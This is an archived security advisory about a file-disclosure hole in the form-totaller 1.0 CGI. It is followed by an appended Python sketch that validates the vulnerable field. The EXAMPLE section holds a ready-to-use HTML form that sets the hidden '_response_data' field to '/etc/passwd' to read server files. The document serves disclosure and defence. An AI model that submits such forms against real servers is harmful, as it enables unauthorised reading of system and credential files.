
form-totaller.txt
Posted Aug 14, 2000
Authored by Signal 9

Form-Totaller version 1.0 (form-totaller.cgi) trusts user input for filenames, allowing a remote user to read any file on the webserver.

tags | exploit, remote, cgi
SHA-256 | e3d777d52f8cfacde87ec258a2d6cfa48ba8b637c56c21835cdf716ee4620394

Content-Type: Remote Root via vulnerable CGI software
Date : 13/08/2000
Sender : s1gnal_9 <s1gnal-9@vs-solutions.com>
Subject : form-totaller Vulnerable CGI
X-System : UNIX/NT systems running the form-totaller CGI software
X-Status : s1gnal_9-ADVISORY-form-totaller.txt
X-Greets : Narr0w, f0bic, VetesGirl
_________________________________________________________________________________


PRODUCT NAME: form-totaller version 1.0

PRODUCT HOMEPAGE: http://www.newbreedsoftware.com/form-totaller/
Also Available at freecode.com

DESCRIPTION :
Use "form-totaller" to create tests and quizzes on the web.
Use forms with pull-down menus or radio buttons and this CGI will display
output based on their input.

PROBLEM:
The command field "_response_data" is the field that specifies the display output
based on their input.

The default file for this field is set at:
<input type="hidden" name="_response_data" value="responses.dat">
A remote attacker could easily change the form submitted to the CGI script so
that "/etc/passwd" is used as the response data value.


EXAMPLE:
Below is an example of how we could read files on the remote system.

<-------------------------CUT HERE-------------------------------------->
<form action="http://www.SOMESERVER.com/form-totaller/form-totaller.cgi" method="post">
<input type="hidden" name="_response_top" value="top.html">
<input type="hidden" name="_response_data" value="/etc/passwd">
<input type="hidden" name="_response_bottom" value="bottom.html">
<input type="hidden" name="_divide_by" value="4">
<input type="submit" value="Click for viewing of the /etc/passwd file.">
</form>
<-------------------------CUT HERE-------------------------------------->


SOLUTION
I would recommend hard-coding the response_data file right into the script
and leaving that command field out of the CGI.
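
A sketch of the fix on the server side, as an added example that is not form-totaller's own code: it pins "_response_data" to an allowlist holding only the default "responses.dat", which amounts to hard-coding it, and generalizes slightly by also checking that the resolved path stays inside the data directory. The function names and the single-directory layout are assumptions made for the example.

```python
import os

# Assumption: the CGI's data files sit in a single directory, and
# "responses.dat" (the advisory's default) is the only one allowed.
ALLOWED_RESPONSE_FILES = frozenset({"responses.dat"})
DEFAULT_RESPONSE_FILE = "responses.dat"


def resolve_response_file(field_value, base_dir, allowed=ALLOWED_RESPONSE_FILES):
    """Return the absolute path for a submitted _response_data value.

    Raises ValueError unless the value is an allowlisted bare filename
    that resolves to a location inside base_dir.
    """
    name = field_value or DEFAULT_RESPONSE_FILE
    # A bare filename has no NUL byte and no path separator of either style.
    if "\x00" in name or "/" in name or "\\" in name or name in (".", ".."):
        raise ValueError("path components are not allowed in _response_data")
    if name not in allowed:
        raise ValueError("file is not on the allowlist")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # realpath follows symlinks, so an allowlisted name that points outside
    # the data directory is rejected here.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path leaves the data directory")
    return candidate


def is_rejected(field_value, base_dir):
    """True if resolve_response_file refuses the value."""
    try:
        resolve_response_file(field_value, base_dir)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as data_dir:  # constructed sample layout
        open(os.path.join(data_dir, "responses.dat"), "w").close()
        for value in ("responses.dat", "/etc/passwd", "../../etc/passwd", "top.html"):
            print(repr(value), "rejected" if is_rejected(value, data_dir) else "accepted")
```

The same check applies to "_response_top" and "_response_bottom" if the script opens those values as files too.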


Please visit www.zone.ee/unix :)
